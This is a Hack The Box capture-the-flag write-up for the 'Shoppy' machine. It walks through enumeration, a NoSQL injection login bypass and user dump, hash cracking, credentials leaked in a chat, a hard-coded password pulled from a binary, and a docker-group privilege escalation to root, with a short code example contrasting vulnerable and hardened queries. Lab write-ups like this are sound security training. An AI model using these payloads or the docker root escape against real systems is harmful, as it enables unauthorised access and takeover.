Hack The Box write-ups: Shoppy

Falken Smaze
7 min read, Feb 8, 2023


Enumeration

NMAP:

So, there are two services running on the box: SSH and HTTP. When a CTF box exposes only these two, the way in is almost always a vulnerability in the web application, so that is where to focus.

In the scan, nmap got redirected to http://shoppy.htb, so we have to add this hostname to the /etc/hosts file.

vi /etc/hosts

Now we access the website.

Nothing really interesting here, so we continue our enumeration with some directory busting and VHOST discovery (subdomain discovery).

I will be using gobuster for both of these tasks, however feel free to use whichever tool suits you best.

This is the command I used for subdomain discovery:

┌──(kali㉿kali)-[~/htb/shoppy]
└─$ gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://shoppy.htb/

And this is the command I used for directory busting:

┌──(kali㉿kali)-[~/htb/shoppy]
└─$ gobuster dir -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

After running both commands, I found another domain, mattermost.shoppy.htb, and two directories that actually work and are interesting: /admin and /login. Both of them lead to /login (/admin redirects there).

Investigating the login page

Taking a look at this login form, I figured there must be some sort of SQL injection. I tried many default credentials, but nothing worked.

After testing pretty much all of the known SQL injection auth-bypass payloads, I figured there was only one class left to test: NoSQL injection. HackTricks has an article on NoSQL injection describing the technique and the payloads to use for it.

The payload that works is: admin'||'1==1

Foothold

This is the administrator page of Shoppy. After looking around, I realised the only function present on this back-end is the ability to search for users. We could theoretically fuzz the search parameter with a list of usernames, but something smarter is to just reuse the same injection payload in that field.

The reason this works is that when we inject '||'1==1, the query the back-end builds effectively becomes "username equals the given value OR 1==1", and the OR condition is ALWAYS true. Because every record satisfies it, the search returns the entire list of users instead of a single match.
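To make the two paragraphs above concrete, here is an added example (not code from the Shoppy box or its write-up) that models why admin'||'1==1 matches every user when a username is spliced into a MongoDB-style $where expression, beside a hardened lookup that treats the input as data. The string-concatenated filter and the sample user records are assumptions constructed for the demonstration; the real application's query code is not on the page.

```javascript
// Constructed sample collection standing in for the users collection.
const USERS = [
  { username: "admin", password: "constructed-hash-1" },
  { username: "josh", password: "constructed-hash-2" },
];

// VULNERABLE (assumed pattern): the user-supplied value is concatenated into a
// JavaScript expression that is evaluated once per document, which is exactly
// what a MongoDB $where clause does. With the input admin'||'1==1 the
// expression becomes:  this.username == 'admin'||'1==1'
// The string '1==1' is truthy, so the OR is true for every document.
function findUsersVulnerable(input) {
  const expr = "this.username == '" + input + "'";
  const predicate = new Function("return (" + expr + ");");
  return USERS.filter((doc) => predicate.call(doc));
}

// HARDENED: the value is never interpreted as code. It must be a plain string
// (rejecting objects blocks operator injection such as {"$ne": ""} as well),
// and it is compared as data, so quotes and || carry no meaning.
function findUsersSafe(input) {
  if (typeof input !== "string") {
    throw new TypeError("username must be a string");
  }
  return USERS.filter((doc) => doc.username === input);
}

// Returns a usernames-only view, which is what the export would reveal.
function usernamesMatching(finder, input) {
  return finder(input).map((doc) => doc.username);
}

console.log(usernamesMatching(findUsersVulnerable, "admin'||'1==1")); // both users
console.log(usernamesMatching(findUsersSafe, "admin'||'1==1")); // nobody
```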

After you download the exported JSON file, you’ll find these two users in it. Take their hashes to https://crackstation.net/ and crack them there. The only hash that cracks is Josh’s.

You can try to log in with his credentials on the shoppy.htb website, however nothing new will appear. Now it’s time to add mattermost.shoppy.htb to the /etc/hosts file, just like we did earlier.

Now, for the username enter josh and for the password enter the one you’ve just cracked from the export file.

Right off the bat, we spot credentials in this chat room. I enumerated every chat available, but this was the only one containing sensitive information.

Now it’s time to get inside the box. Get those credentials, and SSH your way into the machine.

┌──(kali㉿kali)-[~/htb/shoppy]
└─$ ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Nov 29 02:55:12 2022 from 10.10.16.111
jaeger@shoppy:~$

For the user flag: cat /home/jaeger/user.txt

Privilege Escalation

I ran linpeas on the box, but it didn’t really find anything useful. So it’s time to do the privilege escalation the manual way.

First, we check our groups.

jaeger@shoppy:~$ whoami
jaeger
jaeger@shoppy:~$ groups
jaeger
jaeger@shoppy:~$

Nothing interesting pops up there. So, let’s see if we can run any program as another user.

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
jaeger@shoppy:~$

And we can! We can run the password-manager program as the user deploy. Let’s investigate further.

jaeger@shoppy:~$ cd /home/deploy/
jaeger@shoppy:/home/deploy$ ls -lah
total 52K
drwxr-xr-x 3 deploy deploy 4.0K Jul 23 03:34 .
drwxr-xr-x 4 root root 4.0K Jul 22 13:12 ..
lrwxrwxrwx 1 deploy deploy 9 Jul 22 13:14 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 deploy deploy 3.5K Mar 27 2022 .bashrc
-rw------- 1 deploy deploy 56 Jul 22 13:15 creds.txt
lrwxrwxrwx 1 deploy deploy 9 Jul 23 03:34 .dbshell -> /dev/null
drwx------ 3 deploy deploy 4.0K Jul 23 03:31 .gnupg
-rwxr--r-- 1 deploy deploy 19K Jul 22 13:20 password-manager
-rw------- 1 deploy deploy 739 Feb 1 2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy 807 Mar 27 2022 .profile
jaeger@shoppy:/home/deploy$

We can see that the source code is here, as well as a creds.txt file, but we do not have the rights to read either of them. Let’s run the password-manager program as deploy to see what happens.

jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
Welcome to Josh password manager!
Please enter your master password: ???
Access denied! This incident will be reported !

So, we need a master password to access the credentials. Let’s look at the compiled binary itself. Poorly written code often leaks secrets this way: a hard-coded password is stored as a plain string literal in the executable, and compilation does nothing to hide it (strings password-manager would show the same thing without the terminal noise of cat).

jaeger@shoppy:/home/deploy$ cat password-manager
The output is mostly gibberish, but buried somewhere inside it is this:

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txt

So now we have the master password: Sample.

jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

Perfect, we’re closer to getting a root shell. Let’s switch users to deploy.

jaeger@shoppy:/home/deploy$ su deploy
Password:
$ whoami
deploy
$ groups
deploy docker
$

So now we’re deploy. After running the groups command, we can see that we are a member of the docker group.

Going to GTFOBins, we can see that docker is exploitable if we have the rights to use it, and we do: membership of the docker group is effectively root, because the daemon will happily mount the host filesystem into a container. So, let’s try to get a shell.

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
#

We have rooted the box. All that’s left to do now is grab the root flag and submit it to HackTheBox.

# cat /root/root.txt
7979{CENSORED}fd

I hope you’ve enjoyed this walkthrough as much as I’ve enjoyed making it! For more content like this, hit that follow button.
